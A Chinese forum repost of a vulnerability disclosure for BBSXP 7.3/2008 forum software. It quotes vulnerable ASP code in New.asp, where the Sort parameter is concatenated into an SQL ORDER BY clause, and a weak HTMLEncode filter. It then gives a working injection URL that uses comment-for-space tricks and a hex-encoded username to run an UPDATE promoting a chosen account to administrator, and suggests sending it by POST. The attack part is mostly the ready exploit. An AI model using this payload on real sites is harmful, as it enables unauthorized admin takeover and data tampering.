• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    BBSXP论坛程序New.asp页面过滤不严导致SQL注入漏洞

    发布者: 火山休眠期 | 发布时间: 2025-6-28 23:09| 查看数: 45| 评论数: 0|帖子模式

    受影响系统:
    BBSXP7.3
    BBSXP2008漏洞文件:
    New.asp代码分析:Sort=HTMLEncode(Request("Sort")) //第24行if Sort = empty then
    SqlSort="ThreadID"
    else
    SqlSort=Sort
    end if
    。。。。。。
    sql="Select top "&SqlTopicCount&" * from ["&TablePrefix&"Threads] where Visible=1 "&SqlForumID&" "&SqlTimeLimit&" order by "&SqlSort&" desc" //第66行过滤函数HTMLEncode 在文件BBSXP_Class.asp中:
    Function HTMLEncode(fString)
    fString=Replace(fString,CHR(9),"")
    fString=Replace(fString,CHR(13),"")
    fString=Replace(fString,CHR(22),"")
    fString=Replace(fString,CHR(38),"&") '“&”
    fString=Replace(fString,CHR(32)," ") '“ ”
    fString=Replace(fString,CHR(34),""") '“"”
    fString=Replace(fString,CHR(39),"'") '“'”
    fString=Replace(fString,CHR(42)&CHR(42),"**") '“**”/**/
    fString=Replace(fString,CHR(44),",") '“,”
    fString=Replace(fString,CHR(45)&CHR(45),"--") '“--”
    fString=Replace(fString,CHR(60),"<") '“<”
    fString=Replace(fString,CHR(62),">") '“>”
    fString=Replace(fString,CHR(92),"\") '“\”
    fString=Replace(fString,CHR(59),";") '“;”
    fString=Replace(fString,CHR(10),"<br>")
    fString=ReplaceText(fString,"([&#])([a-z0-9]*);","$1$2;")if SiteConfig("BannedText")<>"" then fString=ReplaceText(fString,"("&SiteConfig("BannedText")&")",string(len("&$1&"),"*"))if IsSqlDataBase=0 then '过滤片假名(日文字符)[\u30A0-\u30FF] by yuzi
    fString=escape(fString)
    fString=ReplaceText(fString,"%u30([A-F][0-F])","&#x30$1;")
    fString=unescape(fString)
    end ifHTMLEncode=fString
    End Function
    HTMLEncode过滤了Tab键,空格,** .
    变量SqlSort过滤不严导致sql注入漏洞的产生。漏洞测试:
    http://localhost/bbsxp/new.asp?Sort=ThreadID/*o*/update/*o*/bbsxp_users/*o*/set/*o*/UserRoleID=1/*o*/where/*o*/Username=0x6C006F00760065006D006D006D00/*o*/select/*o*/*/*o*/from/*o*/BBSXP_users/*o*/order/*o*/by/*o*/userid
    成功修改用户名为lovemmm为管理员。(最好使用POST提交呵呵)

    来源:https://www.jb51.net/hack/5533.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    浏览过的版块

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表